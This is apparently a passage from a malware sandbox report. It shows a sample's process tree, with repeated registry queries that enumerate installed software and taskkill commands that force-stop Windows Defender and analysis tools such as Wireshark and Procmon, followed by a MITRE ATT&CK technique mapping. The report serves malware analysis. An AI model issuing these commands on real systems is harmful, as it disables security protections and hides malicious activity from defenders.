    PID:2024
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:240
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:64
    3⤵
    PID:1216
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:32
    3⤵
    PID:1996
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1848
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:64
    3⤵
    PID:1928
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:32
    3⤵
    PID:1656
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1100
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:64
    3⤵
    PID:748
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:32
    3⤵
    PID:1952
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1592
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:64
    3⤵
    PID:2020
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:32
    3⤵
    PID:2008
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:108
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1908
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:64
    3⤵
    PID:552
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:32
    3⤵
    PID:892
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1332
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:64
    3⤵
    PID:744
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:32
    3⤵
    PID:536
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1264
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:64
    3⤵
    PID:1912
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:32
    3⤵
    PID:2040
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1644
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2024
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:64
    3⤵
    PID:1008
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:32
    3⤵
    PID:1968
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:860
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:64
    3⤵
    PID:1860
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:32
    3⤵
    PID:112
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1380
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:64
    3⤵
    PID:1796
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:32
    3⤵
    PID:1336
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:748
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:64
    3⤵
    PID:1624
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:32
    3⤵
    PID:684
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1612
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1368
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:64
    3⤵
    PID:1520
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:32
    3⤵
    PID:1572
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1812
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:64
    3⤵
    PID:660
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:32
    3⤵
    PID:1804
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1112
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:64
    3⤵
    PID:1840
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:32
    3⤵
    PID:1640
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1664
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:64
    3⤵
    PID:552
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:32
    3⤵
    PID:760
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1692
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:64
    3⤵
    PID:1780
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:32
    3⤵
    PID:752
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1788
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1652
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1936
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1852
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1608
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1216
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1824
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1928
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1796
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1624
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1708
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1520
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1088
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:824
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:2000
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:2044
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:660
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:2008
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:2012
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1640
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:480
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:760
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2032
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1492
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1568
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2028
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1448
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1552
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1332
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:892
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1596
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:108
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1652
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1984
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:764
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1376
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1924
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1824
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1996
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1644
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1852
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1656
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1336
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1808
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1632
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1036
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1572
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1084
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1972
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1804
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1960
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1900
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1948
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1920
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1840
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1584
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:480
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1780
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1120
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1568
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1112
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" /reg:64
    3⤵
    PID:1496
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" /reg:32
    3⤵
    PID:1552
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1812
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:64
    3⤵
    PID:556
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:32
    3⤵
    PID:1340
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1628
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:64
    3⤵
    PID:1596
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:32
    3⤵
    PID:1936
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1844
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:64
    3⤵
    PID:764
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:32
    3⤵
    PID:1216
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:112
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Adobe AIR" /reg:64
    3⤵
    PID:1912
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Adobe AIR" /reg:32
    3⤵
    PID:1644
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1820
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:64
    3⤵
    PID:684
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:32
    3⤵
    PID:1808
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2004
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}" /reg:64
    3⤵
    PID:1520
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}" /reg:32
    3⤵
    PID:1612
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2020
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1116
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:64
    3⤵
    PID:2044
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:32
    3⤵
    PID:1916
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:584
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:64
    3⤵
    PID:1524
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:32
    3⤵
    PID:1584
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1672
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:64
    3⤵
    PID:1120
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:32
    3⤵
    PID:1908
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1136
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:64
    3⤵
    PID:1552
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:32
    3⤵
    PID:1368
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2024
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:64
    3⤵
    PID:108
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:32
    3⤵
    PID:1596
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1576
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:64
    3⤵
    PID:1924
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:32
    3⤵
    PID:1216
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2036
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:64
    3⤵
    PID:1112
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:32
    3⤵
    PID:2012
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1844
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364" /reg:64
    3⤵
    PID:860
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364" /reg:32
    3⤵
    PID:1376
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1664
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}" /reg:64
    3⤵
    PID:1900
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}" /reg:32
    3⤵
    PID:1100
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:660
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}" /reg:64
    3⤵
    PID:1696
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}" /reg:32
    3⤵
    PID:1608
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:536
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:64
    3⤵
    PID:1972
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:32
    3⤵
    PID:240
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1928
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:64
    3⤵
    PID:1008
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:32
    3⤵
    PID:1912
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:796
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:64
    3⤵
    PID:1892
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:32
    3⤵
    PID:1808
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1572
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1832
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2020
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:376
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1596
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1840
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1560
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1476

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

